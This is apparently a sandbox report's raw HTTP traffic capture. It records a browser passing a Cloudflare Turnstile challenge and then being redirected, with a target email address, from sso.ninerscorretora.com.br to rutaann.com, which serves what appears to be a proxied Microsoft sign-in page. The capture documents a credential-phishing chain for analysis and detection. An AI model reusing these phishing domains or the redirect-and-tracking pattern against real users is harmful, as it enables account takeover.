                                                        cf-chl-out: ITvZFd3ZjsdUen+jPM5UBl36imurXmBit0Da7xrhdNSQ9Q/thi9jvW2UxKR5ErzJkqI+urVbu1IuE6zH/I0M7w==$5G610cahqvKe5qa6NUBBbg==
                                                        Server: cloudflare
                                                        CF-RAY: 92612962aed3e0ee-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:39 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                        Data Ascii: {"err":100280}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.449763104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:43 UTC1191OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 41710
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-Type: text/plain;charset=UTF-8
                                                        cf-chl: 5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI
                                                        cf-chl-ra: 0
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:43 UTC16384OUTData Raw: 49 6d 6c 70 7a 66 36 53 72 48 6c 69 57 43 2b 36 6e 61 4d 30 6c 4c 77 61 6b 61 67 70 57 37 37 43 42 36 52 61 58 70 55 35 50 36 73 61 4d 37 66 35 36 54 61 78 31 61 36 72 37 6d 61 4b 61 43 37 57 55 24 63 61 6f 44 66 46 61 24 41 57 31 6a 59 61 48 57 36 4f 61 6c 72 61 33 67 36 42 75 47 4f 61 35 37 61 42 35 75 6c 6b 57 61 62 61 66 6e 34 61 4d 70 66 57 72 61 24 5a 57 61 48 61 6c 57 36 55 61 69 6d 61 49 49 48 66 54 56 31 61 49 63 6d 42 6c 38 36 61 64 61 55 42 61 4c 47 42 4c 4c 63 73 52 55 66 56 32 67 70 36 49 58 63 6c 44 6a 63 70 61 62 4b 36 31 55 61 36 38 61 75 35 6e 66 4b 6a 37 61 75 47 33 35 37 63 4a 6c 44 61 78 37 48 4b 6b 24 54 6c 7a 61 61 56 73 50 61 61 59 67 79 53 61 37 4d 6c 61 58 44 61 45 35 5a 37 38 61 55 2b 2b 38 37 42 4c 2d 44 36 64 35 70 61 64 32 37
                                                        Data Ascii: Imlpzf6SrHliWC+6naM0lLwakagpW77CB6RaXpU5P6saM7f56Tax1a6r7maKaC7WU$caoDfFa$AW1jYaHW6Oalra3g6BuGOa57aB5ulkWabafn4aMpfWra$ZWaHalW6UaimaIIHfTV1aIcmBl86adaUBaLGBLLcsRUfV2gp6IXclDjcpabK61Ua68au5nfKj7auG357cJlDax7HKk$TlzaaVsPaaYgySa7MlaXDaE5Z78aU++87BL-D6d5pad27
                                                        2025-03-25 20:29:43 UTC16384OUTData Raw: 5a 31 5a 46 59 66 4f 38 59 74 64 66 6b 24 36 4c 5a 37 6f 55 55 66 66 52 77 59 35 55 6d 6a 33 6d 53 71 79 55 76 4c 57 48 69 72 4b 70 41 72 46 44 42 49 72 51 42 6f 6a 68 6c 62 72 37 70 66 49 4a 76 2d 42 57 6b 48 36 4c 70 36 61 43 55 75 4e 6a 43 76 7a 30 6f 66 59 42 61 6f 69 70 75 6d 36 6a 6d 30 70 75 2d 42 50 68 43 32 6a 43 44 4d 61 53 62 30 6d 36 66 7a 69 2d 66 2d 72 6c 57 69 2d 36 24 69 53 67 43 74 37 69 36 59 61 35 37 43 63 36 66 44 30 37 69 49 57 44 61 31 37 75 55 70 58 61 57 37 75 51 42 51 51 75 33 4b 24 6e 4b 6d 30 78 36 48 69 6d 78 31 66 77 52 69 79 6e 7a 4b 70 54 42 56 6d 42 4b 4c 24 37 2b 70 38 6d 31 6b 44 2b 37 61 50 4b 34 37 52 5a 66 72 55 73 53 56 6d 59 6e 44 51 63 33 35 49 72 55 64 37 43 61 4c 44 7a 56 57 6a 44 30 71 66 69 61 66 44 43 49 61 77
                                                        Data Ascii: Z1ZFYfO8Ytdfk$6LZ7oUUffRwY5Umj3mSqyUvLWHirKpArFDBIrQBojhlbr7pfIJv-BWkH6Lp6aCUuNjCvz0ofYBaoipum6jm0pu-BPhC2jCDMaSb0m6fzi-f-rlWi-6$iSgCt7i6Ya57Cc6fD07iIWDa17uUpXaW7uQBQQu3K$nKm0x6Himx1fwRiynzKpTBVmBKL$7+p8m1kD+7aPK47RZfrUsSVmYnDQc35IrUd7CaLDzVWjD0qfiafDCIaw
                                                        2025-03-25 20:29:43 UTC8942OUTData Raw: 41 4b 4b 2b 31 24 41 41 78 52 54 62 4c 62 42 78 56 55 49 47 77 42 34 51 4d 43 48 41 41 55 4b 53 77 52 50 61 6c 39 5a 61 58 78 2b 62 52 61 39 72 53 56 75 72 66 79 61 39 34 47 57 36 45 41 62 34 38 57 36 4d 61 52 66 37 71 6d 74 70 4e 32 24 44 36 44 61 4a 7a 67 7a 75 6a 57 6e 50 4a 59 4e 39 49 66 79 30 37 66 58 74 35 42 67 6c 4a 33 31 46 71 35 6c 73 77 4b 52 71 37 74 55 63 46 52 68 4a 47 61 41 5a 70 67 39 54 66 50 4c 56 34 58 45 63 55 52 56 70 30 6a 58 47 6e 34 35 75 73 35 48 54 62 24 47 38 68 75 47 53 30 30 39 61 32 49 2b 69 43 43 58 2d 41 37 7a 30 6e 56 7a 61 39 4f 56 6b 75 45 6f 35 66 4a 57 4c 74 4e 77 32 4b 7a 4c 41 74 2b 4c 38 45 35 39 7a 75 70 36 45 69 7a 5a 66 61 42 37 66 4e 37 6e 75 50 24 46 54 47 35 34 49 4a 61 32 4b 32 37 49 44 61 69 24 43 2b 68 74
                                                        Data Ascii: AKK+1$AAxRTbLbBxVUIGwB4QMCHAAUKSwRPal9ZaXx+bRa9rSVurfya94GW6EAb48W6MaRf7qmtpN2$D6DaJzgzujWnPJYN9Ify07fXt5BglJ31Fq5lswKRq7tUcFRhJGaAZpg9TfPLV4XEcURVp0jXGn45us5HTb$G8huGS009a2I+iCCX-A7z0nVza9OVkuEo5fJWLtNw2KzLAt+L8E59zup6EizZfaB7fN7nuP$FTG54IJa2K27IDai$C+ht
                                                        2025-03-25 20:29:44 UTC282INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4928
                                                        Connection: close
                                                        cf-chl-out: 38dWsKxB+EXleT3mK28DXjBhpe8Okg98gcyi+jFFbFrIAGFV5WJL0pQhLA9oX8t6SvleXQM+OB3iBKrqPe7KFa+DA312c0XjzgGWuhwQjDg=$e9Fi0WxjA/8V+RhPS2dAag==
                                                        2025-03-25 20:29:44 UTC1467INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 52 4a 41 63 55 6a 79 7a 6a 67 4d 78 62 67 4c 50 59 78 30 68 4f 44 6f 35 4e 6d 4f 43 78 5a 6a 74 4c 52 64 64 6b 72 41 77 65 58 79 73 54 76 65 64 63 78 31 66 77 6d 6c 44 6c 4b 6e 52 70 72 43 6a 70 6b 64 4e 34 37 34 57 68 78 78 46 44 74 74 6a 58 2f 72 43 73 42 71 78 7a 73 45 76 6f 76 43 5a 59 65 66 36 43 6f 6b 30 54 30 44 6e 64 62 74 54 71 5a 35 55 52 61 5a 39 67 6a 49 51 6c 34 50 35 55 75 4d 77 77 72 49 6d 4f 4e 65 4f 79 56 6a 77 4f 34 6f 47 6a 37 39 55 55 2f 48 37 62 35 52 63 73 45 43 6a 37 2b 69 30 79 37 34 4e 62 74 46 39 54 4e 4c 48 52 30 2b 54 43 33 56 7a 47 5a 57 39 57 69 77 6f 4a 47 70 56 39 73 39 4b 72 71 77 31 4b 38 48 4c 37 69 63 44 35 70 46 45 50 63 67 57 35 62 45 2b 50 56 73 56 49 78 32 76 55 4e 39 44 55
                                                        Data Ascii: cf-chl-out-s: RJAcUjyzjgMxbgLPYx0hODo5NmOCxZjtLRddkrAweXysTvedcx1fwmlDlKnRprCjpkdN474WhxxFDttjX/rCsBqxzsEvovCZYef6Cok0T0DndbtTqZ5URaZ9gjIQl4P5UuMwwrImONeOyVjwO4oGj79UU/H7b5RcsECj7+i0y74NbtF9TNLHR0+TC3VzGZW9WiwoJGpV9s9Krqw1K8HL7icD5pFEPcgW5bE+PVsVIx2vUN9DU
                                                        2025-03-25 20:29:44 UTC989INData Raw: 75 33 75 55 66 71 79 56 6c 34 36 7a 67 36 61 48 76 62 79 57 6d 71 54 49 7a 4b 36 71 72 38 79 6e 74 35 54 4f 78 38 2b 79 75 73 7a 4f 77 62 75 74 31 37 53 58 74 37 71 2f 70 65 4b 6f 33 65 4b 75 74 37 76 6d 73 72 76 69 31 62 4c 42 30 4f 2f 51 38 62 4f 38 37 66 54 78 2b 4f 4c 65 34 50 7a 61 33 75 66 34 33 37 33 64 77 2b 54 72 7a 63 72 67 43 77 37 66 34 77 45 48 42 67 59 64 2b 51 6f 65 46 78 6e 7a 45 52 73 6a 2f 66 34 49 4a 4f 6a 33 39 77 55 59 2b 76 77 4b 48 69 77 6c 43 79 6b 74 4a 7a 41 55 43 44 4d 65 43 42 4d 7a 45 54 6f 50 4d 79 41 50 50 78 45 2f 4b 7a 38 31 4b 30 45 2f 4b 67 73 6e 53 6a 77 30 51 51 39 43 43 30 63 55 4c 6c 6c 52 54 31 38 38 54 47 4e 59 48 54 59 33 5a 55 42 4b 52 52 35 43 4f 53 6b 70 63 6d 70 42 54 32 4a 41 63 33 64 71 64 6c 42 74 54 56 78
                                                        Data Ascii: u3uUfqyVl46zg6aHvbyWmqTIzK6qr8ynt5TOx8+yuszOwbut17SXt7q/peKo3eKut7vmsrvi1bLB0O/Q8bO87fTx+OLe4Pza3uf4373dw+TrzcrgCw7f4wEHBgYd+QoeFxnzERsj/f4IJOj39wUY+vwKHiwlCyktJzAUCDMeCBMzEToPMyAPPxE/Kz81K0E/KgsnSjw0QQ9CC0cULllRT188TGNYHTY3ZUBKRR5COSkpcmpBT2JAc3dqdlBtTVx
                                                        2025-03-25 20:29:44 UTC1369INData Raw: 48 4a 6f 66 35 56 34 6d 6e 74 34 70 6f 68 39 73 34 65 46 62 4c 43 75 6a 34 69 35 72 6e 6d 51 6b 73 46 7a 6c 73 4b 67 6f 4d 61 66 78 70 7a 47 79 62 6d 4b 6d 5a 69 76 67 36 66 4e 6e 4a 47 67 73 4a 61 31 72 4e 72 46 6e 4c 48 67 76 4f 4b 78 6d 64 37 43 75 65 44 6d 34 37 2f 43 6f 2b 65 6b 75 66 47 36 76 66 54 70 78 73 72 42 72 38 2f 48 31 65 37 7a 79 4d 72 55 79 62 6a 7a 41 37 7a 57 38 64 54 61 32 66 51 44 79 65 4d 42 32 4f 54 63 45 63 33 56 46 2b 37 54 46 4d 77 5a 46 64 33 72 45 4e 73 4f 39 42 45 6a 39 2f 55 6c 33 79 6a 36 41 2b 63 49 2b 53 38 42 42 7a 41 6a 46 51 33 73 4e 54 72 33 37 44 6b 33 4a 68 51 39 4f 79 37 30 51 51 41 2f 2b 45 59 7a 4d 68 78 4c 50 79 55 68 55 45 74 50 49 56 52 4f 45 79 6c 48 53 79 34 74 57 6c 6f 6d 4e 45 38 73 4b 32 41 74 4a 45 51 7a
                                                        Data Ascii: HJof5V4mnt4poh9s4eFbLCuj4i5rnmQksFzlsKgoMafxpzGybmKmZivg6fNnJGgsJa1rNrFnLHgvOKxmd7CueDm47/Co+ekufG6vfTpxsrBr8/H1e7zyMrUybjzA7zW8dTa2fQDyeMB2OTcEc3VF+7TFMwZFd3rENsO9BEj9/Ul3yj6A+cI+S8BBzAjFQ3sNTr37Dk3JhQ9Oy70QQA/+EYzMhxLPyUhUEtPIVROEylHSy4tWlomNE8sK2AtJEQz
                                                        2025-03-25 20:29:44 UTC1369INData Raw: 78 33 59 6d 35 39 68 34 4a 30 74 49 39 78 64 37 69 44 76 48 75 4a 6b 72 71 57 76 36 78 39 67 73 4f 61 78 48 76 48 6c 4a 53 6b 6d 71 4b 47 6d 73 2f 52 69 36 6d 68 31 71 43 78 70 61 2f 4b 74 4e 72 64 6d 72 48 65 6e 64 37 54 72 39 61 6f 31 4c 2b 7a 74 38 76 6f 32 64 36 6a 32 2b 48 6c 39 73 75 7a 71 75 54 56 78 2f 61 35 38 2f 50 61 2f 74 58 4c 37 62 33 47 35 4e 4c 79 43 51 66 72 2f 4f 50 4a 36 4e 37 4c 43 67 6e 56 38 65 6a 67 36 75 49 5a 38 39 51 57 45 39 76 67 47 76 63 62 4a 66 54 35 35 50 30 57 2f 69 4d 76 2b 50 37 73 36 67 76 38 4e 51 34 47 42 41 73 31 4b 4f 30 64 47 2f 63 67 44 52 77 35 44 69 55 41 47 7a 45 35 50 6b 67 59 4a 69 6c 43 4b 44 6f 50 4c 53 6b 6d 49 43 6b 74 4e 44 64 53 50 46 78 4d 50 79 68 62 58 69 78 67 58 79 41 68 4e 44 67 30 59 32 31 57 5a
                                                        Data Ascii: x3Ym59h4J0tI9xd7iDvHuJkrqWv6x9gsOaxHvHlJSkmqKGms/Ri6mh1qCxpa/KtNrdmrHend7Tr9ao1L+zt8vo2d6j2+Hl9suzquTVx/a58/Pa/tXL7b3G5NLyCQfr/OPJ6N7LCgnV8ejg6uIZ89QWE9vgGvcbJfT55P0W/iMv+P7s6gv8NQ4GBAs1KO0dG/cgDRw5DiUAGzE5PkgYJilCKDoPLSkmICktNDdSPFxMPyhbXixgXyAhNDg0Y21WZ
                                                        2025-03-25 20:29:44 UTC1201INData Raw: 75 73 59 69 67 6a 36 68 31 62 72 69 32 65 6e 6d 4a 6f 36 53 73 74 72 6d 44 70 71 43 71 69 61 33 45 78 38 69 75 30 4d 71 4d 70 72 58 4f 70 6f 72 4f 79 72 76 62 30 64 6a 48 75 64 54 44 77 61 36 64 31 4c 6d 32 76 74 32 6d 78 65 4c 67 32 4c 6d 6e 34 4b 36 78 79 2b 57 30 2b 4d 76 32 7a 63 61 31 37 62 76 4b 32 2b 50 72 42 66 33 33 37 2b 62 6d 2b 76 50 64 43 4f 34 47 34 74 6f 4f 34 67 30 54 44 68 41 42 46 77 73 56 2b 76 49 52 46 2f 34 53 45 76 4d 64 46 68 63 52 45 65 45 5a 46 41 50 32 4b 53 6a 39 4a 53 50 73 43 77 51 6e 4c 75 6f 4a 4c 54 4c 35 4f 6a 62 39 46 78 6b 6b 2f 67 38 42 50 51 4e 41 42 7a 38 61 49 78 30 2f 43 30 6b 66 54 44 4d 56 52 55 55 71 54 56 6c 4a 52 54 4e 65 51 44 45 71 56 31 38 7a 58 54 6c 59 4e 6c 45 79 59 69 55 33 52 6d 68 59 54 32 42 73 4c 54
                                                        Data Ascii: usYigj6h1bri2enmJo6SstrmDpqCqia3Ex8iu0MqMprXOporOyrvb0djHudTDwa6d1Lm2vt2mxeLg2Lmn4K6xy+W0+Mv2zca17bvK2+PrBf337+bm+vPdCO4G4toO4g0TDhABFwsV+vIRF/4SEvMdFhcREeEZFAP2KSj9JSPsCwQnLuoJLTL5Ojb9Fxkk/g8BPQNABz8aIx0/C0kfTDMVRUUqTVlJRTNeQDEqV18zXTlYNlEyYiU3RmhYT2BsLT


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.449765104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:44 UTC638OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:44 UTC442INHTTP/1.1 400 Bad Request
                                                        Date: Tue, 25 Mar 2025 20:29:44 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 14
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        cf-chl-out: Gg4nEcWeXV/WO3poGN5UwpIGZkc4Wv/qIYrJeJFTDLO7FlwfS2wlULKMf2BGIOYJVnLP5Kt3d3ZAeKBrvEcH3A==$AqEL7tR/lbkYF7qznMlskQ==
                                                        Server: cloudflare
                                                        CF-RAY: 926129814895005e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:44 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                        Data Ascii: {"err":100280}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.449764103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:44 UTC1277OUTPOST /?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com HTTP/1.1
                                                        Host: sso.ninerscorretora.com.br
                                                        Connection: keep-alive
                                                        Content-Length: 987
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://sso.ninerscorretora.com.br
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
                                                        2025-03-25 20:29:44 UTC987OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 51 6d 79 56 32 32 79 54 42 72 74 75 55 30 5a 56 2d 50 41 6d 52 4f 56 63 31 6f 58 47 43 66 70 57 47 70 52 31 67 5a 65 6c 52 65 55 45 46 58 38 72 33 44 36 76 32 74 76 77 73 67 35 45 36 4e 64 54 6f 77 5f 32 69 58 31 45 62 64 68 32 65 45 4f 73 43 39 64 77 57 76 59 66 51 4a 61 75 65 57 75 53 7a 69 49 57 77 4e 44 6a 70 62 42 53 59 38 76 59 74 66 6e 57 53 78 64 48 67 6f 38 42 42 75 6b 49 66 31 50 53 65 62 69 4c 38 55 59 7a 47 70 6d 5f 70 6a 54 48 6a 66 4e 67 50 61 35 4c 30 52 6d 57 62 62 5f 39 73 37 63 56 78 48 59 35 73 4e 6c 6e 38 65 66 36 7a 77 65 6c 73 4b 31 48 78 53 2d 46 6b 75 42 4c 4e 52 76 6c 43 35 45 4d 74 45 75 45 30 62 48 38 41 44 63 6c 58 59 79 4e 71 73 45 4d 50 30 78 54 37 48 4b
                                                        Data Ascii: cf-turnstile-response=0.QmyV22yTBrtuU0ZV-PAmROVc1oXGCfpWGpR1gZelReUEFX8r3D6v2tvwsg5E6NdTow_2iX1Ebdh2eEOsC9dwWvYfQJaueWuSziIWwNDjpbBSY8vYtfnWSxdHgo8BBukIf1PSebiL8UYzGpm_pjTHjfNgPa5L0RmWbb_9s7cVxHY5sNln8ef6zwelsK1HxS-FkuBLNRvlC5EMtEuE0bH8ADclXYyNqsEMP0xT7HK
                                                        2025-03-25 20:29:45 UTC416INHTTP/1.1 302 Found
                                                        location: https://rutaann.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs
                                                        Date: Tue, 25 Mar 2025 20:29:45 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-25 20:29:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.449767103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:45 UTC1017OUTGET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://sso.ninerscorretora.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:46 UTC313INHTTP/1.1 302 Found
                                                        Set-Cookie: qPdM=jYCRkos9k5Z0; path=/; samesite=none; secure; httponly
                                                        Set-Cookie: qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; path=/; samesite=none; secure; httponly
                                                        location: /?qrc=john.smith%40microsoft.com
                                                        Date: Tue, 25 Mar 2025 20:29:45 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-25 20:29:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.449768103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:46 UTC835OUTGET /?qrc=john.smith%40microsoft.com HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://sso.ninerscorretora.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
                                                        2025-03-25 20:29:46 UTC2566INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: text/html; charset=utf-8
                                                        Expires: -1
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        x-ms-request-id: c2cfa80f-4efd-4d1b-a193-c464c9fce100
                                                        x-ms-ests-server: 2.1.20329.5 - FRC ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-vCl3VUy5O_j-CVB1VXJHwQ' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Set-Cookie: esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; domain=rutaann.com; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: fpc=Ah-8cUX3klZPh9iRdc8cPP4; expires=Thu, 24-Apr-2025 20:29:46 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; domain=rutaann.com; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
                                                        Date: Tue, 25 Mar 2025 20:29:46 GMT
                                                        Connection: close
                                                        content-length: 21531
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
